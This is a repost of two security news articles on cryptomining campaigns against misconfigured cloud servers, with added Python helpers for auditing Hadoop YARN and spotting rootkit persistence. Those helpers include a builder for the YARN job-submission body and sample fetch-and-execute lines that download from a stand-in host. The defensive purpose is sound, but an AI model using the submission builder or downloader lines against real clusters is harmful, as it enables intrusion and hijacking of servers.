Hackers Exploit Misconfigured YARN, Docker, Confluence, Redis Servers for Crypto Mining
http://www.indiavpn.org/2024/03/06/hackers-exploit-misconfigured-yarn-docker-confluence-redis-servers-for-crypto-mining/
Wed, 06 Mar 2024 18:22:21 +0000

Mar 06, 2024 | Newsroom | Server Security / Cryptocurrency


Threat actors are targeting misconfigured and vulnerable servers running Apache Hadoop YARN, Docker, Atlassian Confluence, and Redis services as part of an emerging malware campaign designed to deliver a cryptocurrency miner and spawn a reverse shell for persistent remote access.

“The attackers leverage these tools to issue exploit code, taking advantage of common misconfigurations and exploiting an N-day vulnerability, to conduct Remote Code Execution (RCE) attacks and infect new hosts,” Cado security researcher Matt Muir said in a report shared with The Hacker News.

The activity has been codenamed Spinning YARN by the cloud security company, with overlaps to cloud attacks attributed to TeamTNT, WatchDog, and a cluster dubbed Kiss-a-dog.

It all starts with deploying four novel Golang payloads that are capable of automating the identification and exploitation of susceptible Confluence, Docker, Hadoop YARN, and Redis hosts. The spreader utilities leverage masscan or pnscan to hunt for these services.


“For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host,” Muir explained.

The initial access then paves the way for the deployment of additional tools to install rootkits like libprocesshider and diamorphine to conceal malicious processes, drop the Platypus open-source reverse shell utility, and ultimately launch the XMRig miner.

“It’s clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments,” the company said.

The development comes as Uptycs revealed 8220 Gang’s exploitation of known security flaws in Apache Log4j (CVE-2021-44228) and Atlassian Confluence Server and Data Center (CVE-2022-26134) as part of a wave of assaults targeting cloud infrastructure from May 2023 through February 2024.


“By leveraging internet scans for vulnerable applications, the group identifies potential entry points into cloud systems, exploiting unpatched vulnerabilities to gain unauthorized access,” security researchers Tejaswini Sandapolla and Shilpesh Trivedi said.

“Once inside, they deploy a series of advanced evasion techniques, demonstrating a profound understanding of how to navigate and manipulate cloud environments to their advantage. This includes disabling security enforcement, modifying firewall rules, and removing cloud security services, thereby ensuring their malicious activities remain undetected.”

The attacks, which single out both Windows and Linux hosts, aim to deploy a cryptocurrency miner, but not before taking a series of steps that prioritize stealth and evasion.


It also follows the abuse of cloud services primarily meant for artificial intelligence (AI) solutions to drop cryptocurrency miners as well as host malware.

“With both mining and AI requiring access to large amounts of GPU processing power, there’s a certain degree of transferability to their base hardware environments,” HiddenLayer noted last year.

Cado, in its H2 2023 Cloud Threat Findings Report, noted that threat actors are increasingly targeting cloud services that require specialist technical knowledge to exploit, and that cryptojacking is no longer the only motive.

“With the discovery of new Linux variants of ransomware families, such as Abyss Locker, there is a worrying trend of ransomware on Linux and ESXi systems,” it said. “Cloud and Linux infrastructure is now subject to a broader variety of attacks.”

Cryptominers Targeting Misconfigured Apache Hadoop and Flink with Rootkit in New Attacks
http://www.indiavpn.org/2024/01/12/cryptominers-targeting-misconfigured-apache-hadoop-and-flink-with-rootkit-in-new-attacks/
Fri, 12 Jan 2024 08:13:21 +0000

Jan 12, 2024 | Newsroom | Cryptocurrency / Malware


Cybersecurity researchers have identified a new attack that exploits misconfigurations in Apache Hadoop and Flink to deploy cryptocurrency miners within targeted environments.

“This attack is particularly intriguing due to the attacker’s use of packers and rootkits to conceal the malware,” Aqua security researchers Nitzan Yaakov and Assaf Morag said in an analysis published earlier this week. “The malware deletes contents of specific directories and modifies system configurations to evade detection.”

The infection chain targeting Hadoop leverages a misconfiguration in the ResourceManager of YARN (Yet Another Resource Negotiator), the component responsible for tracking cluster resources and scheduling applications.

Specifically, when the ResourceManager's HTTP interface is reachable without authentication, an unauthenticated remote threat actor can execute arbitrary code by means of a crafted HTTP request that submits a new application; the code then runs with whatever privileges the YARN container has on the node it is scheduled to.


The attacks aimed at Apache Flink likewise take aim at a misconfiguration that permits a remote attacker to achieve code execution without any authentication.

These misconfigurations are not novel and have been exploited in the past by financially motivated groups like TeamTNT, which is known for its history of targeting Docker and Kubernetes environments for the purpose of cryptojacking and other malicious activities.

But what makes the latest set of attacks noteworthy is the use of rootkits to hide the crypto mining processes after obtaining an initial foothold in the Hadoop and Flink applications.

“The attacker sends an unauthenticated request to deploy a new application,” the researchers explained. “The attacker is able to run a remote code by sending a POST request to the YARN, requesting to launch the new application with the attacker’s command.”

The command is purpose-built to clear the /tmp directory of all existing content, fetch a file called “dca” from a remote server, and execute it, followed by deleting all files in the /tmp directory once again.
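The YARN submission path described above, as an added example that is not code from the Aqua report, Apache Hadoop, or the attacker's toolkit. It shows three things a defender will want side by side: the shape of the REST exchange the ResourceManager accepts when no authentication is configured (the endpoint paths and JSON keys are YARN's real API), a heuristic for recognising a wipe-fetch-execute command in a submitted application, and an offline audit of Hadoop's XML configuration for the settings that leave the endpoint open. The staging host, the application name and the sample command are constructed to mirror the chain the report describes, not copied from it.

```python
"""Audit helpers for the Hadoop YARN ResourceManager attack path.

Added example, not code from the Aqua report or from Apache Hadoop.
Host names, the application name and SAMPLE_COMMAND are constructed.
"""
import json
import re
import xml.etree.ElementTree as ET

# Real YARN RM REST paths; the RM web/REST port is 8088 by default.
NEW_APP_PATH = "/ws/v1/cluster/apps/new-application"  # POST -> {"application-id": ...}
SUBMIT_PATH = "/ws/v1/cluster/apps"                    # POST with the JSON built below


def build_submit_payload(app_id: str, command: str) -> dict:
    """Return the JSON body YARN expects to launch an ApplicationMaster container.

    With hadoop.security.authentication=simple and no HTTP auth filter, an
    anonymous client obtains app_id from NEW_APP_PATH and POSTs this body to
    SUBMIT_PATH; a NodeManager then runs `command` inside a container.
    """
    return {
        "application-id": app_id,
        "application-name": "spark-shell",  # benign-looking name, constructed
        "application-type": "YARN",
        "am-container-spec": {"commands": {"command": command}},
        "unmanaged-AM": False,
        "max-app-attempts": 1,
    }


# Indicators of the reported chain: wipe /tmp, fetch a binary, run it, wipe again.
_FETCH = re.compile(r"\b(curl|wget)\b")
_EXEC = re.compile(r"(chmod\s+\+?x|\./\S+|/tmp/\S+)")
_WIPE = re.compile(r"rm\s+-\S*r\S*\s+/tmp")


def suspicious_command_reasons(command: str) -> list:
    """Why a submitted container command looks like a downloader stage."""
    reasons = []
    if _FETCH.search(command):
        reasons.append("remote fetch")
    if _WIPE.search(command):
        reasons.append("/tmp wipe")
    if _FETCH.search(command) and _EXEC.search(command):
        reasons.append("fetch-then-execute")
    return reasons


def audit_hadoop_config(xml_text: str) -> list:
    """Flag core-site/yarn-site settings that allow anonymous job submission."""
    props = {p.findtext("name"): (p.findtext("value") or "").strip()
             for p in ET.fromstring(xml_text).iter("property")}
    http_auth = props.get("hadoop.http.authentication.type", "simple")
    findings = []
    if props.get("hadoop.security.authentication", "simple") != "kerberos":
        findings.append("hadoop.security.authentication is not kerberos")
    if http_auth == "simple":
        findings.append("hadoop.http.authentication.type is simple (no HTTP auth)")
        if props.get("hadoop.http.authentication.simple.anonymous.allowed", "true") == "true":
            findings.append("anonymous HTTP users allowed")
    if props.get("yarn.resourcemanager.webapp.address", "0.0.0.0:8088").startswith("0.0.0.0"):
        findings.append("RM web/REST endpoint bound on all interfaces")
    return findings


# Constructed command mirroring the reported chain (placeholder host).
SAMPLE_COMMAND = ("rm -rf /tmp/* ; curl -s http://staging.example/dca -o /tmp/dca ; "
                  "chmod +x /tmp/dca ; /tmp/dca ; rm -rf /tmp/*")

WEAK_CONFIG = """<configuration>
  <property><name>hadoop.security.authentication</name><value>simple</value></property>
</configuration>"""

HARDENED_CONFIG = """<configuration>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
  <property><name>yarn.resourcemanager.webapp.address</name><value>10.0.0.5:8088</value></property>
</configuration>"""

if __name__ == "__main__":
    print(json.dumps(build_submit_payload("application_1700000000000_0001", SAMPLE_COMMAND), indent=2))
    print(suspicious_command_reasons(SAMPLE_COMMAND))
    print(audit_hadoop_config(WEAK_CONFIG))
    print(audit_hadoop_config(HARDENED_CONFIG))
```

The configuration audit is the part to run first: a ResourceManager with `hadoop.security.authentication` left at `simple` accepts the submission body from anyone who can reach port 8088, so network exposure plus that default is the whole vulnerability. The command heuristic is for RM audit logs or a submission-time hook and will not catch a stage that is base64-wrapped; treat it as one signal, not a gate.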


The executed payload is a packed ELF binary that acts as a downloader to retrieve two rootkits and a Monero cryptocurrency miner binary. It’s worth pointing out that various adversaries, including Kinsing, have resorted to employing rootkits to conceal the presence of the mining process.

To achieve persistence, a cron job is created to download and execute a shell script that deploys the ‘dca’ binary. Further analysis of the threat actor’s infrastructure reveals that the staging server used to fetch the downloader was registered on October 31, 2023.
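Host-side checks for the persistence and hiding techniques named in both articles above (the cron job that re-fetches the downloader, and the libprocesshider and diamorphine rootkits), as an added example that is not code from Cado, Aqua, or those tools. The three functions take their input as text or a callable so they run offline on constructed samples; the `live_*` helpers at the end read the real host. The sample crontab, preload file, staging host and process table are constructed.

```python
"""Offline indicators for cron re-download persistence and process-hiding rootkits.

Added example, not code from the reports or the rootkit projects named.
SAMPLE_CRONTAB, SAMPLE_PRELOAD and the fake process table are constructed.
"""
import os
import re
from typing import Callable, Iterable, List

# A cron line that pulls from the network and runs the result: wget/curl piped
# into a shell, or followed by chmod / a /tmp path / an explicit sh.
_FETCH_EXEC = re.compile(
    r"\b(curl|wget)\b[^|;&]*?(\|\s*(ba)?sh\b|;\s*(chmod|\./|/tmp/|sh\s))"
)


def cron_fetch_exec_entries(crontab_text: str) -> List[str]:
    """Return the cron lines that fetch something remotely and execute it."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if _FETCH_EXEC.search(line):
            hits.append(line)
    return hits


def preload_findings(preload_text: str) -> List[str]:
    """Any entry in /etc/ld.so.preload is rare on a server; libprocesshider lives there.

    Every non-comment path is reported; paths outside the system library
    directories get an extra tag because that is where dropped objects land.
    """
    findings = []
    for line in preload_text.splitlines():
        path = line.strip()
        if not path or path.startswith("#"):
            continue
        tag = "preload entry"
        if not path.startswith(("/lib", "/usr/lib")):
            tag += " outside system library dirs"
        findings.append(f"{tag}: {path}")
    return findings


def hidden_pids(listed: Iterable[int], pid_exists: Callable[[int], bool], max_pid: int) -> List[int]:
    """PIDs that a direct /proc/<pid> probe sees but a directory listing omits.

    libprocesshider (LD_PRELOAD) and diamorphine (LKM) filter entries out of
    readdir/getdents; a direct stat on /proc/<pid> still succeeds, so the gap
    between the two views exposes the hidden process. Assumption: the rootkit
    does not also hook path lookup.
    """
    seen = set(listed)
    return [pid for pid in range(1, max_pid + 1) if pid not in seen and pid_exists(pid)]


# Live helpers (Linux only); not used by the offline samples below.
def live_listed_pids() -> List[int]:
    return [int(n) for n in os.listdir("/proc") if n.isdigit()]


def live_pid_exists(pid: int) -> bool:
    return os.path.exists(f"/proc/{pid}/status")


# Constructed samples mirroring the described persistence and hiding artifacts.
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * wget -q -O- http://staging.example/run.sh | sh
*/15 * * * * curl -s http://staging.example/dca -o /tmp/dca; chmod +x /tmp/dca; /tmp/dca
"""
SAMPLE_PRELOAD = "/usr/local/lib/libprocesshider.so\n"

if __name__ == "__main__":
    print(cron_fetch_exec_entries(SAMPLE_CRONTAB))
    print(preload_findings(SAMPLE_PRELOAD))
    # Constructed process table: the listing omits PID 4242 but /proc/4242 answers.
    print(hidden_pids([1, 2, 100], lambda p: p in {1, 2, 100, 4242}, 5000))
```

On a live host, call `hidden_pids(live_listed_pids(), live_pid_exists, int(open("/proc/sys/kernel/pid_max").read()))` and read `/etc/ld.so.preload` plus every crontab under `/etc/cron*` and `/var/spool/cron`. These checks run from userland on the possibly compromised box, which is exactly what the rootkits are built to subvert; a hit is reliable, a clean result is not, and the agent-based detection recommended below (or an offline image of the disk) is the stronger answer.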

As mitigations, it’s recommended that organizations deploy agent-based security solutions to detect cryptominers, rootkits, obfuscated or packed binaries, as well as other suspicious runtime behaviors.
